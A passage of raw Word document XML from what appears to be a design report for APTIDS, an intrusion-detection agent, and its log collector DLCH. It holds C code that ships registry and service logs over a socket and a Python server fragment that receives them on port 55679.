          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00010AEF" w:rsidRDefault="00594D87" w:rsidP="00010AEF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">SendLogToServer connects to DLCH, DLCH will return another available port upon any connection. SendLogToServer terminates the previous connection and reconnects to the new received port. That connection now in used for sending log data to DLCH. </w:t>
      </w:r>
      <w:r w:rsidR="00D42607">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>According to type of log data which is specified by APTIDS’</w:t>
      </w:r>
      <w:r w:rsidR="002723A5">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>s modules.</w:t>
      </w:r>
      <w:r w:rsidR="00B81AF2">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> APTIDS firstly send to Server its local Computer Name and Windows Version on the default port for identify itself. Then it sends log data for storing on server using the returned port number.</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switch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>dwLogType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)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LOG_TYPE_REGISTRY</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hRegFile = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CreateFileW(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>L"Logs/tmpRegistry.log"</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GENERIC_READ</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FILE_SHARE_READ</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OPEN_EXISTING</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dwErrorCode = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>GetLastError(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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(dwErrorCode == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ERROR_SUCCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)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lastRenderedPageBreak/>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ReadFile(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">hRegFile, lpRegBuffer, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_BUFFER_LEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, &amp;dwRegByteRead, 0);</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L"%s\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, lpRegBuffer);</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CloseHandle(hRegFile);</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"Error Code: %d\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, dwErrorCode); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// Debug</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//Start sending Log</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(dwRegByteRead &gt; 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dwByteNeeded = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>WideCharToMultiByte(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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CP_UTF8</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lpRegBuffer,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-1,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pRegBuffer,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pRegBuffer = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>calloc(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>dwByteNeeded, 1);</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WideCharToMultiByte(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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CP_UTF8</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lpRegBuffer,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-1,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pRegBuffer,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dwByteNeeded,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"Sending Registry Log to Server: %s \n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, pRegBuffer);</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send(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ConnectSocket, (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)pRegBuffer, dwByteNeeded, 0);</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LOG_TYPE_SERVICE</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hSvcFile = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CreateFileW(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>L"Logs/tmpService.log"</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GENERIC_READ</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FILE_SHARE_READ</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OPEN_EXISTING</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dwErrorCode = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>GetLastError(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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(dwErrorCode == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ERROR_SUCCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)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ReadFile(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">hSvcFile, lpSvcBuffer, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_BUFFER_LEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, &amp;dwSvcByteRead, 0);</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L"%s\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, lpSvcBuffer);</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CloseHandle(hSvcFile);</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"Error Code: %d\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, dwErrorCode); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// Debug</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//Start sending Log</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(dwSvcByteRead &gt; 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dwByteNeeded = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>WideCharToMultiByte(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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CP_UTF8</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lpSvcBuffer,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-1,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lastRenderedPageBreak/>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pSvcBuffer,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pSvcBuffer = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>calloc(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>dwByteNeeded, 1);</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WideCharToMultiByte(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CP_UTF8</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lpSvcBuffer,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-1,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pSvcBuffer,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dwByteNeeded,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"%d\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, dwByteNeeded); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>//Debut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"Sending Service Log to Server: %s \n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, pSvcBuffer);</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send(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ConnectSocket, (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)pSvcBuffer, dwByteNeeded, 0);</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723A5" w:rsidRDefault="002723A5" w:rsidP="002723A5">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F1CBF" w:rsidRDefault="006F1CBF" w:rsidP="00BA1B83">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002723A5" w:rsidRDefault="006F1CBF" w:rsidP="006F1CBF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Distributed Log Collector Hardware and Centralized Log Storage System</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F1CBF" w:rsidRDefault="00EA71C0" w:rsidP="00EA71C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Distributed Log Collector Hardware</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1B83" w:rsidRDefault="00BA1B83" w:rsidP="00BA1B83">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Server’s source code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1B83" w:rsidRDefault="00BA1B83" w:rsidP="00BA1B83">
      <w:r>
        <w:t>DLCH implements a server for receiving connection from APTIDS agent on monitored systems. The server binds to</w:t>
      </w:r>
      <w:r w:rsidR="003A23CE">
        <w:t xml:space="preserve"> a default</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> port</w:t>
      </w:r>
      <w:r w:rsidR="003A23CE">
        <w:t>, which currently set to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “55679”</w:t>
      </w:r>
      <w:r w:rsidR="003A23CE">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to receive request from client.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1B83" w:rsidRDefault="00BA1B83" w:rsidP="00BA1B8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2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Server():</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">while </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        sock.bind((host, port))</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        sock.listen(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">while </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            (csock, caddr) = sock.accept()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            ComputerName = csock.recv(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1024</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            WindowsVersion = csock.recv(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1024</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">print </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"Computer: {}"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.format(ComputerName)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">print </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"Windows Version: {}"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.format(WindowsVersion)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
